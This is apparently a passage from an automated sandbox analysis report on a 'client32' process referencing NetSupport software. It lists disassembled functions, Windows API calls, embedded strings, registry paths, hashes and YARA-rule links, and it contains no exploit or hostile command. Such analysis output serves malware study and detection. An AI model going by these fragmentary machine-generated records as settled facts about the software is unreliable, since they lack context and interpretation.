                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
                                                                                • String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
                                                                                • API String ID: 2153351953-120756110
                                                                                • Opcode ID: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                • Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
                                                                                • Opcode Fuzzy Hash: 55af8f51facff4bcc049042925dfacc4f9a74063fc1775215d98820dbec6b2aa
                                                                                • Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61
                                                                                Function 1105F830 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 340COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 1105F890
                                                                                • wsprintfA.USER32 ref: 1105F8A4
                                                                                • wsprintfA.USER32 ref: 1105F8FF
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,00000000,?,80000002,?,00020019), ref: 1105F97F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$EnvironmentExpandStrings
                                                                                • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                • API String ID: 2608976442-3241390832
                                                                                • Opcode ID: 2a903cac9ea3e90876404fd3443ab57c65843769289415fd435a4d2424e95264
                                                                                • Instruction ID: e96a2cbbb3b754be6409a963181338f47424fc131a1cec65b85ff3420bffa3c7
                                                                                • Opcode Fuzzy Hash: 2a903cac9ea3e90876404fd3443ab57c65843769289415fd435a4d2424e95264
                                                                                • Instruction Fuzzy Hash: 89D1C375D0126EAEDB61DB64DD54BDEB7B8AF19309F0000D8D909A3181FB746B84CFA2
                                                                                Function 1113B660 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                                • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                                • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                                • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                                • API String ID: 3054845645-718119679
                                                                                • Opcode ID: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                                • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                                • Opcode Fuzzy Hash: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                                • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                                Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • wsprintfA.USER32 ref: 110EB5D8
                                                                                • GetTickCount.KERNEL32 ref: 110EB632
                                                                                • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                                • GetTickCount.KERNEL32 ref: 110EB64E
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                • API String ID: 3451743168-2289091950
                                                                                • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                Function 110398B0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 149windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,0000044D), ref: 110398CC
                                                                                • IsWindowVisible.USER32(00000000), ref: 110398CF
                                                                                • GetDlgItem.USER32(?,0000044F), ref: 110398F8
                                                                                • IsWindowVisible.USER32(00000000), ref: 110398FB
                                                                                • GetDlgItem.USER32(?,000004BE), ref: 11039928
                                                                                • IsWindowVisible.USER32(00000000), ref: 1103992B
                                                                                • GetDlgItem.USER32(?,000017EC), ref: 11039958
                                                                                • IsWindowVisible.USER32(00000000), ref: 1103995B
                                                                                • GetDlgItem.USER32(?,0000048D), ref: 11039988
                                                                                • IsWindowVisible.USER32(00000000), ref: 1103998B
                                                                                • GetDlgItem.USER32(?,0000048E), ref: 110399B8
                                                                                • IsWindowVisible.USER32(00000000), ref: 110399BB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 11039A02
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 11039A06
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemWindow$Visible$EnableErrorExitLastMessageProcesswsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 2531669725-1986719024
                                                                                • Opcode ID: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
                                                                                • Instruction ID: c605c523e88007737b9d27236d90d9a53477605ae0cc304b47ea9e042cf8b0eb
                                                                                • Opcode Fuzzy Hash: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
                                                                                • Instruction Fuzzy Hash: EA4195757407056FF624DAA9CD81F1AB7DAABC8B40F208518F769DB3C0EEB0E8408758
                                                                                Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                • _calloc.LIBCMT ref: 1103945C
                                                                                • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                                • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                • UpdateWindow.USER32(00000000), ref: 11039567
                                                                                • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                • API String ID: 4191401721-1182766118
                                                                                • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                • _memset.LIBCMT ref: 110CB51B
                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                  • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                • API String ID: 2220097787-1587594278
                                                                                • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000004), ref: 11003691
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                • GetSysColor.USER32(00000014), ref: 11003721
                                                                                • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                • GetSysColor.USER32(00000014), ref: 11003755
                                                                                • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                • GetSysColor.USER32(00000010), ref: 11003783
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                                • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                • DeleteObject.GDI32(?), ref: 110037DE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                • String ID:
                                                                                • API String ID: 3698065672-0
                                                                                • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                Function 1104B7F0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 229timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,1B702977,?,?), ref: 1104B8F6
                                                                                • _sprintf.LIBCMT ref: 1104B923
                                                                                  • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
                                                                                • _strncpy.LIBCMT ref: 1104BACE
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
